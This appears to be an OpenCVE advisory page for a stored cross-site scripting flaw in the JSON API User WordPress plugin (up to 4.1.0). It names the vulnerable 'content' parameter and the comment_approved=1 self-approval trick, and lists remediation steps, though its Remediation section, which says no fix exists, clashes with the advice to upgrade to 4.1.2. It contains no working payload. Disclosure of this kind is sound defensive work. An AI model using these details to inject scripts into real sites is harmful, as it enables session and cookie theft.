Description
The JSON API User plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'content' parameter of the post_comment API endpoint in versions up to, and including, 4.1.0 This is due to insufficient input sanitization in the post_comment() function, which passes the attacker-controlled comment_content value directly to wp_insert_comment() without applying any HTML sanitization, and additionally allows the caller to set comment_approved=1 to self-approve the comment and bypass moderation. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2026-07-03
Score: 6.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The JSON API User plugin for WordPress contains a stored cross‑site scripting flaw in the post_comment() API endpoint. Attacker‑controlled content passed through the 'content' parameter is inserted into the database without sanitization and can be self‑approved with the 'comment_approved'=1 flag, allowing the comment to appear immediately. The result is that any user who loads a page that displays the comment will execute the injected scripts, potentially stealing cookies, hijacking sessions, or altering page content.

Affected Systems

The vulnerability affects all releases of the JSON API User plugin by parorrey from installation up to and including version 4.1.0. The fix was introduced in version 4.1.2 and later. WordPress sites that have the plugin installed and publish comments via the API are therefore at risk.

Risk and Exploitability

The flaw carries a CVSS score of 6.4, indicating a moderate severity. EPSS data is not available and the vulnerability is not currently listed in CISA's KEV catalog. Since the exploit requires only authenticated subscriber‑level access, it is likely to be leveraged on sites with many users; once a comment is inserted, the malicious script executes for all subsequent page views until the comment is removed.

Generated by OpenCVE AI on July 3, 2026 at 13:01 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the JSON API User plugin to version 4.1.2 or newer, which sanitizes input and removes the self‑approve option.
  • Reduce subscriber privileges so they cannot post comments via the API, or enable comment moderation to block auto‑approval of new comments.
  • If the plugin is not essential to site functionality, disable or uninstall it to eliminate the vulnerability.
  • Optionally, use a web‑application firewall or similar rule to block POST requests to the 'post_comment' endpoint that contain script tags in the 'content' field.

Generated by OpenCVE AI on July 3, 2026 at 13:01 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 03 Jul 2026 08:00:00 +0000

Type Values Removed Values Added
First Time appeared Parorrey
Parorrey json Api User
Wordpress
Wordpress wordpress
Vendors & Products Parorrey
Parorrey json Api User
Wordpress
Wordpress wordpress

Fri, 03 Jul 2026 05:30:00 +0000

Type Values Removed Values Added
Description The JSON API User plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'content' parameter of the post_comment API endpoint in versions up to, and including, 4.1.0 This is due to insufficient input sanitization in the post_comment() function, which passes the attacker-controlled comment_content value directly to wp_insert_comment() without applying any HTML sanitization, and additionally allows the caller to set comment_approved=1 to self-approve the comment and bypass moderation. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title JSON API User <= 4.1.0 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'content' Parameter
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}


Subscriptions

Parorrey Json Api User
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-07-03T04:30:19.039Z

Reserved: 2026-05-26T17:20:23.199Z

Link: CVE-2026-9626

cve-icon Vulnrichment

No data.

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-07-03T13:15:12Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')